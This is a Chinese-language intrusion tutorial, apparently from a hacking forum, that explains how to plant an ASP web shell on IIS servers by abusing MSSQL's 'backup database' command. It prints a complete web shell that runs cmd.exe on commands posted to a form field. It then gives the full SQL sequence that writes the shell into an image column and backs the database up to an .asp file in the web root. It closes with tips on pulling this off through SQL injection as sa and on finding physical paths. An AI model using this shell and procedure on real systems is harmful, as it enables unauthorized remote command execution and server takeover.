最早想到利用数据库系统来写文件大约MySQL下面的事情吧，我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的，第一步，也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。ACCESS功能不那么强大，有注入漏洞的时候也不能直接获得执行任何命令的权限，就不说了；MSSQL倒是有很多人详细研究过，执行命令的方法罗列了很多，可是没有了exec的权限，所做的还是有限。很多人就在问，MSSQL下面能不能导出一张表到文件，就像MySQL那样子，至少先获得一个低权限的shell来看看，我找来找去也没有找到导出表的命令，只好另想方法--不能导出表，那就只好导出数据库了，效果嘛，大部分情况下还是一样的。
　　在说明做法前，还是先来看看为什么可以。IIS在通过asp.dll处理.asp扩展名文件的时候，对< %%>以外的内容，不做任何处理就直接输出，比如拷贝一个.exe文件到web发布目录，改扩展名为.asp后在IE中请求，返回来的结果是多半是.exe文件的内容，而不会是一个500服务器内部错误。而对于< %%>括起来的内容，默认情况下是按照VBScripts的方式解释执行后给出结果，如果在< %%>里面的内容有语法错误，才会出现常见的500服务器内部错误。换句话说，如果有一个以.asp为扩展名的文件，只要能精心控制所有的< %%>中的内容，我们就能够让它正确的执行，而至于< %%>以外的东西，asp.dll不去处理它，我们也不去关心。
　　再来看看在MSSQL下使用backup database的情况。随便导出一个数据库看看，比如model，当然了，可以在查询分析器中做：
　　
　　backup database model to disk=''c:\a.txt''
　　
　　用文本的方式打开这个文件。通过上面的分析，我们只要知道默认的情况下，如果把这个文件改扩展名为.asp后，请求时会不会出现问题，于是我们查找是否存在< %和%>，呵呵，显然是没有的吧，也就是说我们的请求会返回文本方式的内容。首先是默认的导出文件不会导致解释执行时的错误，这是很关键的一步，剩下的就是我们要让他变为一个shell，当然是做一个表进去了，表的内容在备份的时候一定会被存储到备份文件中去的，我们可以控制表的内容，自然也可以控制备份文件的内容。
　　到这里可能有人已经想一股脑儿把经典的asp shell的内容写入新建的表然后backup database了，嗯，还没有那么简单，你这样做了的话，如果还想继续我们的实验，那可能要花上重装MSSQL的代价。对于文本类型等的数据，比如text,nvchar等，在数据库中可能的形式是"abc"，但是在导出文件中，已经变成了宽字符的形式，成了"a b c "，这样子的话，即使你好心写的是一个"< %"，到了备份文件中，一样的成了"<　% "，里面的内容更是乱七八糟，根本不会被解释执行了。为了避免这种情况，我们创建的表列项应该是一个二进制形式的，比如属性为image，这样子，在里面添加的内容，原来是什么导出的备份文件中也就是什么，规规矩矩的，一点都不会变了。
　　到了这里，最后只剩下一个问题了，就算你把asp shell的内容写入新建的二进制表，总不会是单独的一行吧，谁知道同一个表的两行之间，在导出的备份文件中会不会还有其它的一些内容呢，如果是这样的话，前面一行< %后的内容倒是可以，中间如果有些乱七八遭的数据，用VBScripts的方式解释执行百分之一百是一个500错误。所以每一行必须是一个完整的< %%>，这样子，我们才能完全的控制< %%>内的内容，保证能够得到一个正确无误的asp shell。
　　OK，终于到了实践的部分了。通过上面的分析，应该知道利用backup database来做一个shell是完全可行的，我们先来改写一下那个利用FSO的asp shell，使其能够符合我们的要求：
　　
　　< % Dim oScript %>
　　< % Dim oScriptNet%>
　　< % Dim oFileSys, oFile%>
　　< % Dim szCMD, szTempFile%>
　　< % Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>
　　< % Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>
　　< % Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>
　　< % szCMD = Request.Form(".CMD")%>
　　< % If (szCMD < > "") Then%>
　　< % szTempFile = "C:\" & oFileSys.GetTempName()%>
　　< % Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>
　　< % Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>
　　< % End If %>
　　< HTML>< BODY>< FORM action="< %= Request.ServerVariables("URL") %>" method="POST">
　　< input type=text name=".CMD" size=45 value="< %= szCMD %>">< input type=submit value="Run">< /FORM>< PRE>
　　< % If (IsObject(oFile)) Then%>
　　< % On Error Resume Next%>
　　< % Response.Write Server.HTMLEncode(oFile.ReadAll)%>
　　< % oFile.Close%>
　　< % Call oFileSys.DeleteFile(szTempFile, True)%>
　　< % End If%>
　　< /BODY>< /HTML>
　　
　　然后打开查询分析器，依次输入以下的SQL查询语句。这些语句的大意就是创建一张表，里面有一个二进制image类型的列，然后把我们上面改写的那个shell作为内容输进去，最后导出整个数据库到一个.asp文件，开始！
　　
　　use model
　　create table cmd (str image);
　　insert into cmd(str) values (''< % Dim oScript %>'');
　　insert into cmd(str) values (''< % Dim oScriptNet%>'');
　　insert into cmd(str) values (''< % Dim oFileSys, oFile%>'');
　　insert into cmd(str) values (''< % Dim szCMD, szTempFile%>'');
　　insert into cmd(str) values (''< % Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>'');
　　insert into cmd(str) values (''< % Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>'');
　　insert into cmd(str) values (''< % Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>'');
　　insert into cmd(str) values (''< % szCMD = Request.Form(".CMD")%>'');
　　insert into cmd(str) values (''< % If (szCMD < > "") Then%>'');
　　insert into cmd(str) values (''< % szTempFile = "C:\" & oFileSys.GetTempName()%>'');
　　insert into cmd(str) values (''< % Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>'');
　　insert into cmd(str) values (''< % Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>'');
　　insert into cmd(str) values (''< % End If %>'');
　　insert into cmd(str) values (''< HTML>< BODY>< FORM action="< %= Request.ServerVariables("URL") %>" method="POST">'');
　　insert into cmd(str) values (''< input type=text name=".CMD" size=45 value="< %= szCMD %>">< input type=submit value="Run">< /FORM>< PRE>'');
　　insert into cmd(str) values (''< % If (IsObject(oFile)) Then%>'');
　　insert into cmd(str) values (''< % On Error Resume Next%>'');
　　insert into cmd(str) values (''< % Response.Write Server.HTMLEncode(oFile.ReadAll)%>'');
　　insert into cmd(str) values (''< % oFile.Close%>'');
　　insert into cmd(str) values (''< % Call oFileSys.DeleteFile(szTempFile, True)%>'');
　　insert into cmd(str) values (''< % End If%>'');
　　insert into cmd(str) values (''< /BODY>< /HTML>'');
　　backup database model to disk=''c:\l.asp'';
　　
　　拷贝c:\l.asp到你的web发布目录，再用浏览器请求一下，没有500错误的话，你已经获得一个shell了，不过这个shell中垃圾数据实在是太多，你要多按几下TAB键才能到输入命令的那个输入框。
　　末了再说说可能出现的问题，一般来说随意选择一个数据库导出，默认情况下里面是不含有< %或者%>的，但也不排除有这种可能，尽管几率很小，但是我就遇到过一次。如果以前没有动过model，导出的文件肯定是符合要求的，但是如果你中途如果写错了些东西，比如创建了一个表，内容有< %但是在同一行内没有%>出现的话，这个数据库就再也不能用了，因为也许是为了事务回滚的需要，即使你删除了这张表，在导出的文件中依然保存有这张表的原始内容，所以，千万要一次成功，错了就完了。
　　当然上面只是在查询分析器中的实验，实际情况下，如果你能以sa的身份注入，当然是比较轻松的，只是猜测web的物理路径的时候可能会稍微有一些麻烦，因为你得一次性导出到web的发布目录，不过也许你可以结合其他暴露物理路径的漏洞来利用。如果不是sa的身份的话，也许declare @a sysname;select @a=db_name()会有一些用处。成功的几率，不敢说的太高，估计80%还是有的吧，如果你真的通过这种方法得到了shell，其实你会发现，这真是世界上最可爱最好用的asp shell--尽管有很多垃圾数据，也许还是个2、3M的大家伙。